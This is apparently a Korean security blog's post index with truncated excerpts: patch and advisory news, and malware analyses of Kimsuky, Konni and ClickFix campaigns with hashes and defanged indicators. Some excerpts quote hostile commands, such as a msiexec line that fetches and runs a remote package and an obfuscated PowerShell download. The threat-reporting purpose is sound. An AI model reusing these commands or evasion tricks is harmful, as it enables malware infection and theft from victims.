반도체 부품 제조사 중 몇 안 되는 선두권 기업x86 기반 소비자용 CPU 제조업과 외장 GPU 제조업에서 각각 인텔, 엔비디아와 경쟁하는 업체인 AMD에서 보안 권고문 AMD-SB-4017을 공개했습니다.AMD Athlon 3000시리즈부터 AMD Ryzen 9000, AMD Ryzen AI 300시리즈에 이르기까지 광범위한 제품이 대상이며, 메인보드 및 PC 제조사에서 제공하는 BIOS 업데이트를 적용할 것을 권장하고 있다.이번에 공개된 취약점은 CVE 번호 기준으로 총 10건이다. CVSS 4.0 기준 점수에 따른 심각도 내용은 High 2건, Medium 6건, Low 1건이며, 그중 가장 심각도가 높은 2건은 모두 AMD Secure Processor(ASP)와 관련된 것ASP의 액세스 제어가 ..
오늘은 북쪽 동네 북한 아니 어떤 장관님 말씀으로 조선이라고 부려야 하는? 아니 북한에서 오산 공군기지를 공격한 것으로 추측되는 김수키(Kimsuky) 에서 만든 악성코드-Update_251001 ACM Sakesan Kantha.pdf.lnk 에 대해서 알아보겠습니다.파일명:Update_251001 ACM Sakesan Kantha.pdf.lnk사이즈:1 MBMD5:b516ec6c6b37618ad65080a063270ea4SHA-1:b9f25b21eccbcca77adb11a0e613d4eca4e38442SHA-256:22180919f562fb9f6e50d7f20b2eb3f94eb009c212b74b45cf77659fe8274d5b일단 악성코드는 당연히 파워셀로 구성이 되어져 있는 악성코드이며 Power..
구글이 크로미움(Chromium)의 미해결 취약점에 대한 세부 정보를 실수로 유출해당 취약점 때문에 브라우저가 닫혀 있어도 자바스크립트가 백그라운드에서 계속 실행되어 기기에서 원격 코드 실행이 가능크로미움 이슈 트래커(Chromium Issue Tracker)의 게시글에 따르면 해당 결함은 보안 연구원 라이라 레베인(Lyra Rebane)이 보고했으며 2022년 12월에 유효한 것으로 인정공격자는 해당 문제를 악용해 다운로드 작업과 같이 절대 종료되지 않는 서비스 워커(Service Worker)를 포함한 악성 웹페이지를 생성할 수 있습니다.레바네는 이를 통해 공격자가 방문자의 기기에서 자바스크립트 코드를 실행할 수 있다고 설명레바네는 원본 버그 보고서를 통해 수만 건의 페이지뷰를 확보해 봇넷을 구축하는..
마이크로소프트는 제로데이 공격에 악용된 두 가지 WIndows Defender 취약점에 대한 보안 패치 배포를 시작첫 번째 취약점(CVE-2026-41091)은 마이크로소프트 맬웨어 방지 엔진(Microsoft Malware Protection Engine) 1.1.26030.3008 및 이전 버전에 영향을 미치는 권한 상승 보안 결함해당 엔진은 마이크로소프트 안티바이러스 및 안티스파이웨어 소프트웨어에 스캔, 탐지, 제거 기능을 제공해당 결함은 파일 액세스 전 부적절한 링크 해결(링크 추적) 취약점에서 비롯된 것으로 공격자가 SYSTEM 권한을 획득할 수 있게 합니다.두 번째 취약점(CVE-2026-45498)은 Microsoft Defender 맬웨어 방지 플랫폼 4.18.26030.3011 및 이전 ..
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 2026년 방위산업기술개발사업 최종평가위원회 위원 위촉 안내.pdf.lnk 에 대해서 알아보겠습니다. 해당 악성코드는 2026년 방위산업기술개발사업 최종평가위원회 위원 위촉 안내 으로 돼 있으면 일단 방위산업기술개방 부분을 노린 것이 아닌지 조심스럽게 생각을 합니다.파일명: 2026년 방위산업기술개발사업 최종평가위원회 위원 위촉 안내.pdf.lnk사이즈:2 MBMD5:c49289228ea08a4e7d5a056cacf8adbdSHA-1:a9f24d4fec3585b729c85355a9dbee8b2cffb721SHA-256:5681ef6d074421cb4dbd3d1389b2d83a4920ee84ed8fd198a739d184c2bc4c0c악성코..
오늘도 북한 김수키(Kimsuky) 에서 만든 악성코드 중 하나인 5월 신고 납부기한 통지서.pdf.lnk 에 대해서 알아보겠습니다. 해당 악성코드는 5월 신고 납부기한 통지서.pdf.lnk,국세 고지서.pdf.lnk 이름으로 유포를 하는 악성코드입니다.MD5:9fc126288c15dc835b1e62baf80f95baSHA-1:b492a503cb4c8360f81adee8f1e07066beb030d1SHA-256:ab96a72cb227b8b10a2f147ecf211e2094483f028fb57b380ec5f391d9e164e9뭐~일단 해당 악성코드에 포함된 것은 PowerShell 사용을 해서 Base64로 인코딩된 부분을 통해서 link24(.)kr 으로 이동을 하게 되어져 있으며 얼마나 악성코드를 많이..
오늘은 부킹닷컴 으로 위장하는 클릭픽스 공격 사이트 분석을 하는 시간을 가져 보겠습니다. 일단 해당 클릭픽스(ClickFix)방법을 통해서 사용자 컴퓨터를 노리는 방식 입니다.유포 사이트propertypanelreservations(.)com일단 해당 사이트에 접속을 하면 먼저 언제나 클릭픽스(ClickFix) 처럼 윈도우+R 를 실행을 하고 나서 복사 붙여 넣기를 하라고 하면 이때부터 사용자는 악성코드를 직접 실행하게 됩니다.msIeXec.ExE -PᵃcKᵃGE hxxp://147(.)45(.)45(.)245/genius /QmsIeXec.ExE:Windows Installer 실행 파일이며 대소문자 섞기는 탐지 우회 목적 가능-PᵃcKᵃGE /package 옵션을 가장한 형태로 보임.ᵃ는 일반 ASC..
오늘도 Kimsuky(김수키)에서 만든 악성코드-하나은행_웨이브릿지 전략적 협업 제안서.lnk 에 대해 글을 적어보겠습니다.일단 해당 악성코드는 하나은행_웨이브릿지 전략적 협업 제안서로 위장하는 것이 특징입니다.파일명: 하나은행_웨이브릿지 전략적 협업 제안서.lnk사이즈:1 MBMD5:3561136674ef90bbe9e64245d42b9ef8SHA-1:78ce7dbf3616e49efba69249121a985d0bd32073SHA-256:45387425929d60b59f8d06c1c07f3e399eac8c5289f234bb5a26912509266fd0악성코드 분석이번에는 HEX로 구성이 되어져 있는 것을 볼 수가 있으며 해당 부분은 CyberChef 로 풀거나 notepad++로 쉽게 디코딩 가능합니다.1..
마이크로소프트는 이전에 이를 설계상 의도된 기능이라고 밝혔으나 마이크로소프트 엣지 웹 브라우저를 업데이트하여 시작 시 저장된 비밀번호를 평문으로 프로세스 메모리에 로딩하지 않도록 조치할 예정해당 문제는 5월 4일 보안 연구원 톰 요란 손스테비세터 뢰닝(Tom Jøran Sønstebyseter Rønning)에 의해 공개되었으며 그는 엣지 내장 비밀번호 관리자에 저장된 모든 인증 정보가 실행 시 복호화되어 사용하지 않을 때도 메모리에 유지된다는 사실을 입증뢰닝은 또한 관리자 권한을 가진 공격자가 다른 사용자의 마이크로소프트 엣지 프로세스에서 비밀번호를 추출할 수 있게 해주는 개념 증명(PoC) 도구를 공개(관리자 권한이 없는 경우 PoC는 같은 사용자가 실행한 엣지 프로세스에만 접근할 수 있다.)그는 또..
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 노X정님.jse 에 대해서 글을 적어보겠습니다.PebbleDash 플랫폼을 기반으로 제작된 악성코드이며 해당 부분은 김수키(Kimsuky)의 자매인 Lazarus Group이 사용했던 도구입니다.2021년 체적으로 활용해 오고 있습니다.Kimsuky는 VSCode 터널링,Cloudflare Quick Tunnels, DWAgent, 대규모 언어 모델(LLM), Rust 프로그래밍 언어 등 다양한 도구를 사용해서 공격에 사용하고 있으며 주로 한국의 공공 및 민간 부문을 표적이며 특히 PebbleDash 클러스터는 전 세계 의료, 군사와 방위 산업 분야에 관심을 보였습니다. PebbleDash 클러스터는 지난 몇 년간 브라질과 한국의 방위 ..
마이크로소프트에서 제공하는 운영체제인 윈도우 11,윈도우 10 에 대한 각각 보안 업데이트가 진행이 되었습니다.일단 윈도우 10 KB5087544 변경점Windows 10 KB5087544마이크로소프트는 더는 Windows 10용 새로운 기능을 출시하지 않으며 KB5087544 업데이트에는 주로 보안 업데이트와 버그 수정 사항이 포함되어 있습니다.마이크로소프트는 120개의 취약점을 수정KB5087544의 전체 수정 사항 목록은 다음과 같습니다:원격 데스크톱 보안 경고 (알려진 문제) 수정된 디스플레이 배율 설정이 서로 다른 다중 모니터 구성에서 원격 데스크톱 연결 보안 경고 대화 상자가 올바르게 표시되지 않을 수 있는 문제가 수정해당 문제는 2026년 4월 14일에 출시된 Windows 보안 업데이트(K..
오늘은 한전 전기 요금 청구서로 위장한 피싱 메일 분석을 해보겠습니다. 해당 피싱 메일은 일단 해당 피싱 메일은 경기도 서남부권과 인천광역시 지역권의 도시가스, 민자발전, 집단에너지 등의 사업을 하는 곳을 노렸습니다.이메일 내용을 보면 한국전력 전기요금 청구서로 돼 있으며 billkorea(빌코리아) 에서 발신한 것처럼 돼 있지만, 해당 업체 하고는 전혀 상관없는 곳입니다.발신자 표시명: 빌코리아->한국 업체처럼 보이도록 위장실제 발신 주소:billkorea@lknight(.)info->billkorea와 상관 없는 부분발신 도메인:lknight.info->업무,청구서 발송 도메인 아님발신 IP:173(.)212(.)214(.)14->독일(DE) 소재로 표시됨수신자:????@samchully(.)co(...
오늘은 북한 해킹 단체 코니(Konni)에서 만든 악성코드인 0a6934a3_.lnk 에 대해 분석을 해보겠습니다.파일명:0a6934a3_.lnk사이즈: 1 MBMD5: 7b4fc4d03238d20938a8c1a763028237SHA-1: 5fd6f20214f3fd1e424e453d2a5e5d78775b130eSHA-256: 6afdbaf73028607b49f725467bf5dce4bb9f8c7b7095e43f09ecfce94b450fd4악성코드 분석1.LNK 내부의 오프셋 0x18A8~0xC1A71 바이트를 읽고 XOR 0x7F로 복호화LNK 내부에 숨겨진 실행용 페이로드2.파일 내부에서 페이로드 읽기0x000018A8:6,312:LNK 내부 페이로드 시작 오프셋0x000C1A71:793,201:읽어올..
인스타그램은 2026년 5월 8일부로 다이렉트 메시지(DM)에서 종단 간 암호화 기능을 제거했습니다.이번 변경으로 메타는 인스타그램 DM의 내용을 열람하고 처리할 수 있게 되었으며 2019년부터 제공되던 선택적 암호화 기능은 종료되었습니 다.인스타그램은 올해 초 이런 변경 사항을 발표했으며 5월 8일부터 해당 조치가 시행되었습니다.인스타그램의 암호화 메시징은 기본적으로 활성화된 적이 없습니다.사용자는 개별적으로 암호화 채팅을 선택해야 했습니다.이제 모든 사용자에 대해 해당 옵션이 제거되었습니다.인스타그램 DM 암호화 제거가 사용자에게 의미종단간 암호화는 발신자와 수신자만이 메시지 내용에 접근할 수 있도록 보장하여 플랫폼 자체는 이를 읽을 수 없게 합니다.암호화가 없으면 메타는 자사 서버에 저장된 메시지에..
오늘은 북한 해킹 조직 김수키(Kimsuky) 에서 만든 피싱 사이트 에 대해 한번 오래간만에 분석을 해보겠습니다.일단 해당 피싱 사이트는 네이버 로그인 화면으로 돼 있는 것이 특징입니다. 일단 예전같이 쓸데없게 만들어 놓은 것이 아니고 진짜와 비슷하게 구성이 돼 있는 것이 특징입니다.특징은 인스타그램 DM 으로 네이버 계정 탈취 목적 김수키(Kimsuky)에서 만든 네이버 피싱 사이트 입니다.hxxps://ncafe-article(.)media입니다.웹 소스를 보면 네이버 카페 : 너무 억울한 일을 당해 참다가... 이런 식으로 돼 있는데 해당 부분은 인스타그램 DM 으로 무작위로 아무에게나 뿌리는 것과 비슷합니다. 오래전부터 해 오던 수법여기서 아이디 비밀번호를 입력하면 다음과 같은 경로로 전송되는 ..
오늘도 즐겁게 북한 해킹 단체 김수키(Kimsuky) 만든 악성코드-Condor_API-1.chm 에 대해서 글을 적어보겠습니다. 일단 해당 악성코드는 Condor Casino API에 관해서 chm 파일인 것처럼 속인 악성코드입니다.Condor Casino API는 카지노 플랫폼이 슬롯, 라이브 카지노, 기타 게임 콘텐츠를 외부 게임 제공사와 연동할 수 있도록 제공되는 API자체 카지노 사이트나 플랫폼에서 여러 게임 제공사의 게임을 실행하고 사용자 잔액, 베팅, 당첨, 보너스, 자유 스핀 등을 API와 콜백 방식으로 처리할 수 있게 해주는 통합 시스템입니다.사용자가 게임 실행 요청운영사 서버가 Condor API의 Launch API 호출Condor API가 게임 세션 URL 반환유저가 해당 URL로 ..
오늘은 코레일(Korail) 4월 급여 명세서로 위장한 피싱 메일 분석을 해보겠습니다. 일단 이메일을 열며 다음과 같은 메일 화면을 볼 수가 있습니다.부착: 1파일 (322.09 KB) AM Korail, 2026년 4월 급여명세서 파일.pdfkeep index 정말 수고 많으셨고, 진심으로 축하드립니다.Payroll Dept.Korail Co., Ltd.헤더 분석표시 발신자:korail Co., Ltd->정상적인 코레일 처럼 보이게 위장실제 From 주소:Hr_account2656@hilywil(.)com->korail.com이 아닌 것을 그냥 눈에 쉽게 확인 가능 메일 주소만 보면 쉽게 확인 가능수신자:w????@korail(.)com제목 4월 급여 지급 안내 Korail 임직원 대상 급여 피싱발신 ..
오늘은 Microsoft Edge(마이크로소프트 엣지)실행 시 저장된 모든 비밀번호를 암호화되지 않은 상태로 프로세스 메모리에 저장 문제에 대해서 알아보겠습니다.한 보안 연구원이 마이크로소프트 엣지(Microsoft Edge)가 브라우저가 실행되는 순간 저장된 모든 비밀번호를 프로세스 메모리에서 복호화하여, 사용자가 해당 사이트를 방문했는지와 관계없이 평문 상태로 보관한다는 사실을 발견했습니다.4월 29일 BigBiteOfTech에서 PaloAltoNtwks Norway가 공개한 해당 발견은 연구원 @L1v1ng0ffTh3L4N이 크로미움 기반 주요 브라우저들의 자격 증명 메모리 처리 방식을 체계적으로 테스트하던 중 밝혀낸 것입니다. 일단 여기서 한국의 네이버에서 공개되는 네이버 웨일은 개인적으로 테스트..
2026년 4월 KB5083769 보안 업데이트 로 인해 Windows 11 24H2 및 25H2를 실행하는 시스템에서 여러 공급업체의 타사 백업 애플리케이션이 정상적으로 작동하지 않는 문제 발생Microsoft MVP인 Susan Bradley가 처음 발견한 사용자 보고에 따르면 해당 문제는 VSS(볼륨 섀도 복사본 서비스) 스냅샷을 사용하는 소프트웨어에 영향을 미치며 VSS 서비스 시간 초과 때문에 오류가 발생Microsoft VSS는 Windows Server 2003에 도입되었으며 운영 체제, 백업 소프트웨어 및 비즈니스 애플리케이션(예: SQL Server 및 Exchange)이 보다 효과적으로 연동하도록 도와줍니다.또한, VSS는 Windows Server Backup, System Cente..
오늘은 정체를 알 수가 없는 APT에서 만든 악성코드인 NovaCX_Agency_Updated_2026047_091100_version_1_8 에 대해서 알아보겠습니다.먼저 NovaX는 디지털 경험 솔루션, 암호화폐 거래, 정찰 드론, 국제 투자 행사 등 같은 이름을 공유하는 다양한 산업 분야의 브랜드 및 기술 서비스를 제공하는 업체로 보입니다.파일명:NovaCX_Agency_Updated_2026047_091100_version_1_8.docx.lnk사이즈:1 MBMD5:10b40185106eb3760cb71c46117aa0bfSHA-1:c2d2332b2bf0fecbea7da05792a61da979499b21SHA-256:6e36060854006f9ed029ab7547f4478f0486ba5256ce9..
오늘은 북한 해킹 단체인 김수키(Kimsuky)인 install.bat 에 대해 알아보겠습니다. 해당 악성코드는 파일을 다운로드 및 실행을 하는 구조로 되어져 있으며 이력서로 속이는 것이 특징입니다.파일명:install.bat사이즈:1 MBMD5:77a7767d8f873741d4a93163178c3083SHA-1:f7ec2f4d725dff301f02dd9bf74eb19e0f0f2a52SHA-256:aeb2cbf7f7031467d99c6fa29318bd51642ed5ff46b20458baab8fb2ef671f28분석1.PowerShell 명령 일부러 숨김powe7rshellht7xps://실행할 때는 7 을 제거하는 방식을 사용을 하고 있습니다. 즉 다음 파워셀 명령어를 실행합니다.hxxps://racsw..
오늘은 북한 해킹 조직 김수키(Kimsuky)에서는 만든 전문의약품 제약 회사를 노리는 악성코드-화이트 생명과학 ERP 사양서 에 대해서 알아보겠습니다.일단 ERP 사양서는 회사의 업무를 컴퓨터 프로그램으로 옮기려고 누가, 언제, 어디서, 어떤 자료, 어떻게 처리할지를 상세히 기록한 문서라고 생각을 하시면 됩니다. 일단 해당 업체는 전문의약품과 일반 의약품을 생산하는 전문 의약품 생산 업체로 속여서 아마도 다른 곳을 노린 것이 아닐까? 생각이 됩니다.파일명: 화이트 생명과학 ERP 사양서.lnk사이즈:1 MBMD5:5c3bf036ab8aadddb2428d27f3917b86SHA-1:e9c16aa2e322a65fc2621679ca8e7414ebcf89c0SHA-256:d4c184f4389d710c8aefe..
김수키(Kimsuky) KB 국민카드 사칭 악성코드-KB_202604.html.lnk오늘은 김수키(Kimsuky) KB 국민카드 사칭 악성코드인 KB_202604.html.lnk 에 대해서 알아보겠습니다.일단 해당 악성코드는 먼저 한국 부산 해운대구에서 서비스를 운영하는 link24 사이트를 악용해서 단축 주소를 생성해서 깃헙 과 구글 드라이브를 악용해서 악성코드를 다운로드를 배포 및 실행을 하고 있습니다.일단 link24 는 링크를 생성을 하기 위해서 회원 가입을 해야 하고 그리고 휴대폰 전화 번호를 입력을 해야 하는데 북한 애들이 가입했다고 하면 대포폰 들을 사용했거나 네이버 계정을 해킹해서 회원 가입을 했기 때문에 해당 업체에 영장을 들고 가든 해서 경찰 분들은 수사하시면 될 것이고…. 해당 부분은..
오늘은 북한 해킹 단체인 Kimsuky(김수키) 에서 만든 악성코드인 2026년 한국 에너지 기술개발산업 최종 평가 위원회에 대해서 글을 적어 보겠습니다.파일명: 2026년 한국 에너지 기술개발산업 최종 평가 위원회2026년 한국 에너지 기술개발산업 최종 평가 위원회.lnk사이즈:1 MBMD5:b5943724f56eb0c38d841cf0e8faecd7SHA-1:1b9b934e0a864c652c0aaa180474b363e5967effSHA-256:3b93311f419499bb55af2307a83f3de28ab9014f30e266d6b2cc5a73e54a0dfc악성코드 분석1. 특정 크기 .lnk 찾기크기가 0x000C5C0E인 .lnk 파일을 검색십진수로는 809,998 바이트먼저 현재 폴더에서 찾고 없으..
마이크로소프트에서 제공하는 윈도우 및 오피스 관련 프로그램에 대한 제로데이 취약점 2개를 포함한 총 167개의 취약점에 대한 보안 업데이트가 포함 되어져 있는 보안 업데이트를 진행을 했습니다.이번 패치 화요일에는 8개의 심각한 취약점이 해결되는데, 그중 7개는 원격 코드 실행 취약점이고 나머지 하나는 서비스 거부 취약점93건의 권한 상승 취약점13건의 보안 기능 우회 취약점20건의 원격 코드 실행 취약점21건의 정보 유출 취약점10건의 서비스 거부 취약점9건의 스푸핑 취약점이달 초 마이크로소프트가 수정한 Mariner, Azure, Bing 관련 결함은 포함되지 않았으며 또한 구글이 수정한 Microsoft Edge/Chromium 관련 결함 80건도 포함되지 않았습니다.제로데이 취약점 2건 및 Micr..
어도비는 지난 12월 이후 제로데이 공격에 악용되어 온 CVE-2026-34621로 추적되는 취약점을 해결하기 위해 Acrobat Reader용 긴급 보안 업데이트를 발표했습니다.이번 결함으로 말미암아 악성 PDF 파일이 샌드박스 제한을 우회하고 권한이 높은 JavaScript API를 호출할 수 있어 임의 코드 실행으로 이어질 가능성이 있습니다.공격에서 관찰된 익스플로잇은 임의의 파일을 읽고 훔치는 것을 가능해지며 악성 PDF를 여는 것 외에는 사용자의 추가적인 상호작용이 필요하지 않습니다.구체적으로 익스플로잇은 util.readFileIntoStream()과 같은 API를 악용하여 임의의 로컬 파일을 읽고, RSS.addFeed()를 사용하여 데이터를 유출하고 공격자가 제어하는 추가 코드를 가져옵니다..
오늘은 북한 해킹 단체 중 하나인 김수키(Kimsuky) 에서 육군 K-ICTC(국제과학화전투경연대회)를 노린 악성코드에 대해 분석을 해 보겠습니다.파일명:2026 4th K-ICTC Information.pdf.lnk사이즈:1 MBMD5:b3c90f52e4b86a94ec637fee4354bb84SHA-1:95cc996705f5fb8d7947615269101fb4621306d9SHA-256:169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f먼저 악성코드 내부를 보면 다음과 같이 되어져 있는 것을 확인을 할수가 있으며 해당 악성코드 결과는 다음과 같습니다.악성코드 분석1. 실행현재 위치 기준으로 올라가서 cmd.exe 실행일부러 상대 경로 사..
오늘은 북한 해킹 단체인 김수키(Kimsuky) 에서 만든 악성코드 API Reference(API 레퍼런스) 관련 위장하는 악성코드에 대해 분석을 해 보겠습니다.파일명:api_reference.chm사이즈:1 MBMD5:0ac44ad9cfbc58ed76415f7bc79239f9SHA-1:f759ccb6886234c63a66abd6102c636a46d1eba8SHA-256:1eff237dee95172363bfc0342d0389f809f753a6ec5e6848e57b3fd5482e9793해당 악성코드는 카지노 솔루션 통합 위한 백엔드 명세서를 보여주고 있지만 실제로는 악성코드 가 실행이 되면 사용자에게 보이는 악성코드 미끼 파일문서 내용은 쉽게 다음과 같습니다.Authentication:인증 Bearer ..
해커들이 CPUID 프로젝트의 API에 접근해 공식 웹사이트의 다운로드 링크를 조작해서 널리 사용되는 CPU-Z 및 HWMonitor 도구의 악성 실행 파일을 배포두 유틸리티는 컴퓨터 내부 하드웨어의 물리적 상태를 모니터링 하고 시스템의 종합적인 사양을 확인하기 위해 수백만 명의 사용자가 의존하고 있습니다.최근 레딧(Reddit)에 따르면 해당 도구 중 하나를 다운로드한 사용자들은 공식 다운로드 포털이 Cloudflare R2 스토리지 서비스를 가리키며 다른 개발자가 만든 또 다른 진단 및 모니터링 도구인 HWiNFO의 트로이목마화된 버전을 가져온다고 보고악성 파일의 이름은 HWiNFO_Monitor_Setup이며 해당 악성코드를 실행하면 Inno Setup 래퍼가 포함된 러시아어 설치 프로그램이 실행되..
오늘은 정체를 알수 없는 APT에서 만든 악성코드이며 LG 쪽을 탈취하기 위한 것으로 추측되는 악성코드인 것 같습니다. 어디까지 나 私見AI_Auth_Token_202603.bat 에 대해 글을 적어 보겠습니다.해당 악성코드는 대부분 보안 업체에서 탐지하고 있지 않은 악성코드입니다.파일명: AI_Auth_Token_202603.bat사이즈:1 MBMD5:2e6c90c88feb8a4cacdff126d0234129SHA-1:ac671e74d7ac7b26c7e33eb5a62d20d7695f4235SHA-256:621f852dba6e4657ccf7c27638c6840188718a4ea4894915028040a249eba4d4해당 악성코드는 데이터 수집 및 외부 유출을 담당하는 악성코드입니다.악성코드 분석시스템 ..